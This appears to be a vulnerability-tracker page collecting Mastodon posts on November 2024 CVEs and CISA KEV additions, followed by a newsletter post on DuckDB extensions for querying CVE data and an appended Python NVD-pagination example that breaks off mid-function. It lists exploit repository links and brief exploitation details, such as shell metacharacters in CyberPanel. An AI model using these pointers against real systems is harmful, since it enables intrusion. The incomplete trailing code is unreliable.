mttaggart@infosec.exchange at 2024-11-12T18:54:56.000Z ##

Some fairly interesting stuff for this #PatchTuesday!

Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and a RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.

zerodayinitiative.com/blog/202

##

CVE-2024-43451
(6.5 MEDIUM)

EPSS: 0.47%

updated 2024-11-12T18:31:05

19 posts

NTLM Hash Disclosure Spoofing Vulnerability

threatcodex at 2024-11-14T16:27:22.097Z ##

CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild

clearskysec.com/0d-vulnerabili

##

threatcodex at 2024-11-14T15:49:26.833Z ##

CVE-2024-43451 and other reasons to update ASAP

kaspersky.com/blog/2024-novemb

##

screaminggoat at 2024-11-13T18:13:40.862Z ##

ClearSky: CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
Reference: CVE-2024-43451 (6.5 medium, disclosed 12 November 2024 by Microsoft as an exploited zero-day, added to CISA KEV Catalog same day) NTLM Hash Disclosure Spoofing Vulnerability

ClearSky reports that CVE-2024-43451 was exploited in the wild against Ukrainian entities when it was discovered in June 2024. A compromised Ukrainian government server sent phishing emails which contained a malicious URL file. Any interaction triggers the vulnerability which establishes a connection with the attacker's server and downloads further malicious files like SparkRAT. The campaign is attributed to the suspected Russian threat actor group UAC-0194. See the 14 page PDF report. Indicators of compromise are listed inside.

##

jos1264@social.skynetcloud.site at 2024-11-12T22:20:02.000Z ##

Microsoft Patch Tuesday, November 2024 Edition krebsonsecurity.com/2024/11/mi #MicrosoftPatchTuesdayNovember2024 #SecurityTools #CVE202443451 #CVE202443602 #CVE202449019 #CVE202449039 #CVE202449040 #SatnamNarang #TimetoPatch #GoogleTAG #Tenable

##

jos1264@social.skynetcloud.site at 2024-11-12T20:15:03.000Z ##

Microsoft Confirms Zero-Day Exploitation of Task Scheduler Flaw securityweek.com/microsoft-con #Malware&Threats #Vulnerabilities #CVE202443451 #CVE202449039 #PatchTuesday #Microsoft #Featured #ZeroDay

##

verbrecher@mastodon.social at 2024-11-14T22:26:32.000Z ##

Microsoft has urgently patched two high-risk vulnerabilities actively targeted by attackers:

🔹 CVE-2024-43451 – Attackers can hijack user privileges by exposing NTLMv2 hash credentials, letting them authenticate as the user with a “pass the hash” attack.

🔹 CVE-2024-49039 – A Windows Task Scheduler flaw enabling attackers to escape AppContainer restrictions and gain elevated access.

⚠️ Immediate Action: Update your systems now to block these dangerous exploits!

##

rogeragrimes@infosec.exchange at 2024-11-14T20:24:17.000Z ##

3rd Microsoft vuln this year (among the over a dozen over the years I'm tracking) of how a remote attacker can get a user's Windows password NT hashes without needing to be admin on the user's device. Your passwords need to be truly random...now!

msrc.microsoft.com/update-guid

##

jbhall56@infosec.exchange at 2024-11-14T14:11:13.000Z ##

The vulnerability in question, CVE-2024-43451 (CVSS score: 6.5), refers to an NTLM hash disclosure spoofing vulnerability that could be exploited to steal a user's NTLMv2 hash. It was patched by Microsoft earlier this week. thehackernews.com/2024/11/russ

##

jos1264@social.skynetcloud.site at 2024-11-14T11:00:07.000Z ##

How a Windows zero-day was exploited in the wild for months (CVE-2024-43451) helpnetsecurity.com/2024/11/14 #ClearSkyCyberSecurity #spearphishing #vulnerability #WindowsServer #Don'tmiss #Hotstuff #malware #Ukraine #Windows #News #CVE

##

jos1264@social.skynetcloud.site at 2024-11-12T21:20:03.000Z ##

Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) helpnetsecurity.com/2024/11/12 #MicrosoftDefender #ActiveDirectory #securityupdate #ImmersiveLabs #vulnerability #WindowsServer #PatchTuesday #TrendMicro #Don'tmiss #Microsoft #Hotstuff #OpenSSL #Tenable #Windows #Ivanti #0-day #News #CVE

##

cisakevtracker@mastodon.social at 2024-11-12T19:01:40.000Z ##

CVE ID: CVE-2024-43451
Vendor: Microsoft
Product: Windows
Date Added: 2024-11-12
Vulnerability: Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-12T18:39:59.000Z ##

CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability
  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability
  • CVE-2021-41277 (perfect 10.0 🥳) Metabase GeoJSON API Local File Inclusion Vulnerability
  • CVE-2014-2120 (CVSSv2: 4.3 medium) Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
  • CVE-2021-26086 (5.3 medium) Atlassian Jira Server and Data Center Path Traversal Vulnerability

#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity

##

screaminggoat@infosec.exchange at 2024-11-12T17:59:09.000Z ##

Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities

  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability (EXPLOITED, PUBLICLY DISCLOSED)
  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability (EXPLOITED)
  • CVE-2024-49019 (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability (PUBLICLY DISCLOSED)
  • CVE-2024-49040 (7.5 high) Microsoft Exchange Server Spoofing Vulnerability (PUBLICLY DISCLOSED)

#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-49040
(7.5 HIGH)

EPSS: 0.09%

updated 2024-11-12T18:31:00

4 posts

Microsoft Exchange Server Spoofing Vulnerability

screaminggoat at 2024-11-14T19:34:24.405Z ##

Microsoft Security Response Center (MSRC): CVE-2024-49040 (update)
MSRC temporarily paused the rollout of the update for CVE-2024-49040 (7.5 high, disclosed 12 November 2024) Microsoft Exchange Server Spoofing Vulnerability. According to the Exchange Team blog:

Known issues with this update
We are aware of customers having an issue with the Transport rules stopping periodically after this update is installed. Based on our initial investigation, this can happen to customers who use their own transport or DLP rules. If you are seeing this problem, you might have to uninstall the November SU until it is re-released.
We are continuing the investigation and are working on a permanent fix to address this issue. We will release it when ready. We have also paused the rollout of November 2024 SU to Windows / Microsoft Update. Customers who might not use Transport or DLP rules and did not run into the issue with rules, can continue using the November SU update.

##

ricardo@bsd.cafe at 2024-11-12T21:56:38.000Z ##

Takeaway from Solidlab security researcher Vsevolod Kokorin on CVE-2024-49040
bleepingcomputer.com/news/secu

#mail #microsoft #exchange #smtp

##

screaminggoat@infosec.exchange at 2024-11-12T17:59:09.000Z ##

Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities

  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability (EXPLOITED, PUBLICLY DISCLOSED)
  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability (EXPLOITED)
  • CVE-2024-49019 (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability (PUBLICLY DISCLOSED)
  • CVE-2024-49040 (7.5 high) Microsoft Exchange Server Spoofing Vulnerability (PUBLICLY DISCLOSED)

#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-49039
(8.8 HIGH)

EPSS: 1.23%

updated 2024-11-12T18:31:00

7 posts

Windows Task Scheduler Elevation of Privilege Vulnerability

1 repos

https://github.com/je5442804/WPTaskScheduler_CVE-2024-49039

verbrecher@mastodon.social at 2024-11-14T22:26:32.000Z ##

Microsoft has urgently patched two high-risk vulnerabilities actively targeted by attackers:

🔹 CVE-2024-43451 – Attackers can hijack user privileges by exposing NTLMv2 hash credentials, letting them authenticate as the user with a “pass the hash” attack.

🔹 CVE-2024-49039 – A Windows Task Scheduler flaw enabling attackers to escape AppContainer restrictions and gain elevated access.

⚠️ Immediate Action: Update your systems now to block these dangerous exploits!

##

ChrisShort@hachyderm.io at 2024-11-14T20:45:32.000Z ##

CVE-2024-49039 - Security Update Guide - Microsoft - Windows Task Scheduler Elevation of Privilege Vulnerability #SuggestedRead #devopsish msrc.microsoft.com/update-guid

##

jos1264@social.skynetcloud.site at 2024-11-12T21:20:03.000Z ##

Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) helpnetsecurity.com/2024/11/12 #MicrosoftDefender #ActiveDirectory #securityupdate #ImmersiveLabs #vulnerability #WindowsServer #PatchTuesday #TrendMicro #Don'tmiss #Microsoft #Hotstuff #OpenSSL #Tenable #Windows #Ivanti #0-day #News #CVE

##

cisakevtracker@mastodon.social at 2024-11-12T19:01:55.000Z ##

CVE ID: CVE-2024-49039
Vendor: Microsoft
Product: Windows
Date Added: 2024-11-12
Vulnerability: Microsoft Windows Task Scheduler Privilege Escalation Vulnerability
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

mttaggart@infosec.exchange at 2024-11-12T18:54:56.000Z ##

Some fairly interesting stuff for this #PatchTuesday!

Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and a RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.

zerodayinitiative.com/blog/202

##

screaminggoat@infosec.exchange at 2024-11-12T18:39:59.000Z ##

CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability
  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability
  • CVE-2021-41277 (perfect 10.0 🥳) Metabase GeoJSON API Local File Inclusion Vulnerability
  • CVE-2014-2120 (CVSSv2: 4.3 medium) Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
  • CVE-2021-26086 (5.3 medium) Atlassian Jira Server and Data Center Path Traversal Vulnerability

#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity

##

screaminggoat@infosec.exchange at 2024-11-12T17:59:09.000Z ##

Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities

  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability (EXPLOITED, PUBLICLY DISCLOSED)
  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability (EXPLOITED)
  • CVE-2024-49019 (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability (PUBLICLY DISCLOSED)
  • CVE-2024-49040 (7.5 high) Microsoft Exchange Server Spoofing Vulnerability (PUBLICLY DISCLOSED)

#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-43639
(9.8 CRITICAL)

EPSS: 0.14%

updated 2024-11-12T18:30:59

3 posts

Windows Kerberos Remote Code Execution Vulnerability

CVE-2024-51567
(10.0 CRITICAL)

EPSS: 40.13%

updated 2024-11-08T21:34:54

3 posts

upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and

2 repos

https://github.com/thehash007/CVE-2024-51567-RCE-EXPLOIT

https://github.com/ajayalf/CVE-2024-51567

hrbrmstr@mastodon.social at 2024-11-07T16:43:45.000Z ##

We (GreyNoise) have coverage for 3 of the 4 CVEs in today's CISA KEV Drop:

- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093

Hit up viz.greynoise.io for deets + real/useful/timely blocklists.

CVE-2024-43093 is client-side, hence no coverage.

##

cisakevtracker@mastodon.social at 2024-11-07T16:01:08.000Z ##

CVE ID: CVE-2024-51567
Vendor: CyberPersons
Product: CyberPanel
Date Added: 2024-11-07
Vulnerability: CyberPanel Incorrect Default Permissions Vulnerability
Notes: cyberpanel.net/blog/detials-an ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-07T15:35:09.000Z ##

CISA: CISA Adds Four Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-5910 (9.3 critical) Palo Alto Expedition Missing Authentication Vulnerability
  • CVE-2024-43093 (high) Android Framework Privilege Escalation Vulnerability
  • CVE-2024-51567 (10.0 critical 🥳) CyberPanel Incorrect Default Permissions Vulnerability
  • CVE-2019-16278 (9.8 critical) Nostromo nhttpd Directory Traversal Vulnerability

#cisa #cisakev #kev #vulnerability #CVE #CVE_2024_5910 #CVE_2024_43093 #CVE_2024_51567 #CVE_2019_16278 #infosec #cybersecurity

##

CVE-2024-5910
(9.8 CRITICAL)

EPSS: 97.10%

updated 2024-11-08T21:33:52

9 posts

Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition. Note: Expedition is a tool aiding in configuration migration, tuning, and enrichment. Configuration secrets, credentials, and other data imported into Expedition is at risk due to this issue.

Nuclei template

1 repos

jos1264@social.skynetcloud.site at 2024-11-09T01:20:02.000Z ##

Palo Alto Expedition Missing Authentication Vulnerability (CVE-2024-5910) fortiguard.fortinet.com/threat

##

jos1264@social.skynetcloud.site at 2024-11-08T16:40:03.000Z ##

CISA Finds Palo Alto Networks’ CVE-2024-5910 Exploited in the Wild cyble.com/blog/cisa-finds-palo #Cybernews

##

oversecurity@mastodon.social at 2024-11-08T16:40:07.000Z ##

CISA Finds Palo Alto Networks’ CVE-2024-5910 Exploited in the Wild

The flaw is a missing authentication vulnerability that allows an attacker with network access to take over Palo Alto Expedition’s admin account and...

🔗️ [Cyble] link.is.it/85zu1w

##

jbhall56@infosec.exchange at 2024-11-08T12:55:20.000Z ##

The vulnerability is tracked as CVE-2024-5910 and it was patched by Palo Alto Networks in July. securityweek.com/palo-alto-net

##

jos1264@social.skynetcloud.site at 2024-11-08T12:20:04.000Z ##

Critical Palo Alto Networks Expedition bug exploited (CVE-2024-5910) helpnetsecurity.com/2024/11/08 #PaloAltoNetworks #vulnerability #Horizon3.ai #Don'tmiss #Hotstuff #News #CVE #PoC

##

jos1264@social.skynetcloud.site at 2024-11-08T12:20:03.000Z ##

CISA Alerts Fed Agencies of Active Exploitation of Palo Alto Networks’ CVE-2024-5910 thecyberexpress.com/cisa-alert #ExpeditionVulnerability #paloaltonetworks #TheCyberExpress #CVE-2024-5910 #Vulnerability #CyberNews #PaloAlto

##

hrbrmstr@mastodon.social at 2024-11-07T16:43:45.000Z ##

We (GreyNoise) have coverage for 3 of the 4 CVEs in today's CISA KEV Drop:

- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093

Hit up viz.greynoise.io for deets + real/useful/timely blocklists.

CVE-2024-43093 is client-side, hence no coverage.

##

cisakevtracker@mastodon.social at 2024-11-07T16:06:24.000Z ##

CVE ID: CVE-2024-5910
Vendor: Palo Alto
Product: Expedition
Date Added: 2024-11-07
Vulnerability: Palo Alto Expedition Missing Authentication Vulnerability
Notes: security.paloaltonetworks.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-07T15:35:09.000Z ##

CISA: CISA Adds Four Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-5910 (9.3 critical) Palo Alto Expedition Missing Authentication Vulnerability
  • CVE-2024-43093 (high) Android Framework Privilege Escalation Vulnerability
  • CVE-2024-51567 (10.0 critical 🥳) CyberPanel Incorrect Default Permissions Vulnerability
  • CVE-2019-16278 (9.8 critical) Nostromo nhttpd Directory Traversal Vulnerability

#cisa #cisakev #kev #vulnerability #CVE #CVE_2024_5910 #CVE_2024_43093 #CVE_2024_51567 #CVE_2019_16278 #infosec #cybersecurity

##

CVE-2024-40715
(7.7 HIGH)

EPSS: 0.07%

updated 2024-11-08T19:01:03.880000

1 posts

A vulnerability in Veeam Backup & Replication Enterprise Manager has been identified, which allows attackers to perform authentication bypass. Attackers must be able to perform Man-in-the-Middle (MITM) attack to exploit this vulnerability.

screaminggoat@infosec.exchange at 2024-11-08T14:04:25.000Z ##

Veeam security advisory from 06 November 2024 Veeam Backup Enterprise Manager Vulnerability (CVE-2024-40715)
CVE-2024-40715 (7.7 high) Veeam Backup & Replication Enterprise Manager authentication bypass while performing a Man-in-the-Middle (MITM) attack. No mention of exploitation.

#cybersecurity #infosec #vulnerability #CVE #veeam #cve_2024_40715

##

CVE-2020-11921
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-08T18:31:57

1 posts

An issue was discovered in Lush 2 through 2020-02-25. Due to the lack of Bluetooth traffic encryption, it is possible to hijack an ongoing Bluetooth connection between the Lush 2 and a mobile phone. This allows an attacker to gain full control over the device.

micah@tech.lgbt at 2024-11-12T09:58:01.000Z ##

Lovense's Lush 2 'massage' toy getting its own CVE is hilarious

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-51998
(8.6 HIGH)

EPSS: 0.04%

updated 2024-11-08T13:55:32

1 posts

### Summary

The validation for the file URI scheme falls short, and results in an attacker being able to read any file on the system. This issue only affects instances with a webdriver enabled, and `ALLOW_FILE_URI` false or not defined.

### Details

The check used for URL protocol, `is_safe_url`, allows `file:` as a URL scheme: https://github.com/dgtlmoon/changedetection.io/blob/e0abf0b50507a8a

dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev at 2024-11-09T14:11:00.000Z ##

Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.

But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.


TL;DR

(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)

  • DuckDB GSheets extension enables direct integration with Google Sheets for reading and writing data through SQL, featuring OAuth authentication and basic query syntax (https://duckdb-gsheets.com/)
  • MyDuck Server bridges MySQL and DuckDB by providing a MySQL-compatible interface while storing data in DuckDB’s OLAP format, offering significant performance improvements (https://github.com/apecloud/myduckserver)
  • DuckDB HTTP Client extension allows direct HTTP GET/POST requests within DuckDB queries, enabling integration with web APIs and immediate processing of response data (https://github.com/quackscience/duckdb-extension-httpclient)

Quacking In The [g]Sheets

The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.

The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.

If you work in an environment where domain experts collaborate with data science/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.

Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDB for this to work):

INSTALL gsheets FROM community;
LOAD gsheets;

Basic usage patterns include:

-- Read from a sheet
FROM read_gsheet('spreadsheet_url_or_id');

-- Write to a sheet
COPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);

The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.

I made a perma-copy of my OAuth’d access token:

LOAD gsheets;
CREATE PERSISTENT SECRET (
  TYPE gsheet,
  PROVIDER access_token,
  TOKEN 'yOUrToK3nH3re'
);

And, now we can look at the “schema”:

$ duckdb -json -c "
  LOAD gsheets;
  FROM read_gsheet(
    'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
    sheet = 'Sheet1'
  )
  LIMIT 1" | jq
[
  {
    "Vendor": "Sophos",
    "Title": "Sophos SFOS SQL Injection Vulnerability",
    "CVE": "CVE-2020-12271",
    "CVSS": 9.8,
    "Date of NVD publication": "4/27/20",
    "Date of vendor advisory": "Unknown",
    "Used in ransomware attacks?": "Known",
    "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).",
    "Date added to KEV Catalog": "11/3/21",
    "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412",
    "Date of Known Exploitation": "Apr-20",
    "Threat actor": "Unknown",
    "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal",
    "Metasploit Module": "N",
    "GreyNoise (#of Malicious IPs Scanning)": 0.0,
    "Number of vulnerable devices": "?",
    "Number of impacted devices": "?",
    "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271"
  }
]

And, perform normal ops on it:

$ duckdb -table -c "
LOAD gsheets;
FROM read_gsheet(
  'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
  sheet='Sheet1'
)
SELECT
  Vendor,
  COUNT(Vendor) AS ct
GROUP BY
  Vendor
ORDER BY
  2 DESC"
+---------------------+----+
|       Vendor        | ct |
+---------------------+----+
| Cisco               | 72 |
| D-Link              | 19 |
| Ivanti              | 18 |
| Citrix              | 16 |
| Fortinet            | 13 |
| SonicWall           | 10 |
| Zyxel               | 9  |
| NETGEAR             | 8  |
| Juniper             | 6  |
| F5                  | 6  |
| PANW                | 5  |
| Sophos              | 5  |
| DrayTek             | 3  |
| Tenda               | 3  |
| TP-Link             | 2  |
| MikroTik            | 2  |
| Dasan               | 2  |
| Check Point         | 1  |
| D-Link and TRENDnet | 1  |
| Barracuda           | 1  |
| Netis               | 1  |
| FatPipe             | 1  |
| Arcadyan            | 1  |
| Sumavision          | 1  |
+---------------------+----+

The extension has some notable constraints to consider:

  • Google Sheets’ 1M cell limit per spreadsheet
  • Data must start in cell A1
  • Sheets must exist before writing to them

These limitations aside, the DuckDB GSheets extension will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.

The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.

My🦆Server

MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.

The system operates through dual interfaces — a MySQL wire protocol on port 13306 (for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432 (for direct DuckDB SQL execution).

I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.

If you are a MySQL/MariaDB shop, this might be something to keep on the radar.

Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

Photo by Samson Andreea on Pexels.com

The DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.

By now, you should know how to install/load extensions:

INSTALL http_client FROM community;
LOAD http_client;

The extension provides two main functions: http_get() for GET requests and http_post() for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.

The extension returns responses in a consistent format that includes:

  • HTTP status code
  • Response reason
  • Response body (typically JSON)
  • Response headers

The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.

The README provides a practical example of this extension’s utility: its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.

We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.

We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):

CREATE TABLE yesterday AS (
WITH
  __req AS (
    SELECT
      http_get(
        'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000'
      ) AS res
  ),
  __res AS (
    SELECT
      UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') )
      AS cves
    FROM
      __req
  )
FROM __res
);

We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.

What that query returns is an array of deeply nested JSON records:

FROM yesterday LIMIT 3;
┌──────────────────────────────────────────────────────────────────────────────┐
│                                     cves                                     │
│                                     json                                     │
├──────────────────────────────────────────────────────────────────────────────┤
│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith…  │
│ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith…  │
│ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith…  │
└──────────────────────────────────────────────────────────────────────────────┘

But DuckDB lets us work with JSON pretty seamlessly.

It looks like the NVD contractors are milking their contract for all it’s worth:

FROM yesterday
SELECT
  cves->>'cve'->>'vulnStatus' AS vulnStatus,
  COUNT() AS ct,
  ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pct
GROUP BY ALL;
┌─────────────────────┬───────┬────────┐
│     vulnStatus      │  ct   │  pct   │
│       varchar       │ int64 │ double │
├─────────────────────┼───────┼────────┤
│ Awaiting Analysis   │    83 │  65.87 │
│ Received            │    34 │  26.98 │
│ Undergoing Analysis │     9 │   7.14 │
└─────────────────────┴───────┴────────┘

You can add headers, and use getenv(var) to fill in things like API keys.

This is a super fun extension to play with!

FIN

Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev ☮️

https://dailydrop.hrbrmstr.dev/2024/11/09/bonus-drop-67-2024-11-09-if-it-%f0%9f%9a%81-like-a-%f0%9f%a6%86/

#duckdb

##
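The NVD fetch-and-summarise flow from the Daily Drop post above, as an added Python example that is not part of the original post or of the http_client extension: it walks the NVD CVE API 2.0 startIndex/totalResults pagination (the step the post notes the extension won't do for you) and reproduces the vulnStatus breakdown and a CVSS lookup. The fetch function and the CVE-0000-* records are constructed stand-ins so the script runs offline.

```python
"""Paginate an NVD CVE API 2.0 query and summarise the day's records.

The pages below are constructed sample data in the API's response shape;
fake_fetch is a hypothetical stand-in for the HTTP GET (swap in a real
client, sending the apiKey header from an environment variable, for live use).
"""
import json
from collections import Counter
from urllib.parse import parse_qs, urlparse

NVD_API = "https://services.nvd.nist.gov/rest/json/cves/2.0/"

# Constructed sample: three records served as two pages of resultsPerPage=2,
# so the pagination loop is actually exercised. IDs are placeholders.
_SAMPLE_PAGES = [
    {"resultsPerPage": 2, "startIndex": 0, "totalResults": 3,
     "vulnerabilities": [
         {"cve": {"id": "CVE-0000-0001", "vulnStatus": "Awaiting Analysis",
                  "metrics": {"cvssMetricV31": [{"cvssData": {"baseScore": 7.5}}]}}},
         {"cve": {"id": "CVE-0000-0002", "vulnStatus": "Received",
                  "metrics": {}}},
     ]},
    {"resultsPerPage": 2, "startIndex": 2, "totalResults": 3,
     "vulnerabilities": [
         {"cve": {"id": "CVE-0000-0003", "vulnStatus": "Awaiting Analysis",
                  "metrics": {"cvssMetricV31": [{"cvssData": {"baseScore": 9.8}}]}}},
     ]},
]


def fake_fetch(url: str) -> str:
    """Hypothetical GET: return the constructed page whose startIndex matches
    the request's startIndex query parameter, as the real API would."""
    start = int(parse_qs(urlparse(url).query).get("startIndex", ["0"])[0])
    for page in _SAMPLE_PAGES:
        if page["startIndex"] == start:
            return json.dumps(page)
    raise ValueError(f"no page at startIndex={start}")


def fetch_day(fetch, pub_start, pub_end, results_per_page=2000):
    """Yield every vulnerability record in the publication window, following
    startIndex until totalResults is reached (NVD caps resultsPerPage at 2000)."""
    start = 0
    while True:
        url = (f"{NVD_API}?pubStartDate={pub_start}&pubEndDate={pub_end}"
               f"&startIndex={start}&resultsPerPage={results_per_page}")
        page = json.loads(fetch(url))
        batch = page.get("vulnerabilities", [])
        yield from batch
        start += len(batch)
        # Stop on exhaustion; an empty page also stops us, so an inconsistent
        # totalResults from the server cannot turn this into an infinite loop.
        if not batch or start >= page.get("totalResults", 0):
            break


def vuln_status_breakdown(records):
    """Count and percentage per vulnStatus, mirroring the post's GROUP BY."""
    counts = Counter(r["cve"].get("vulnStatus", "Unknown") for r in records)
    total = sum(counts.values())
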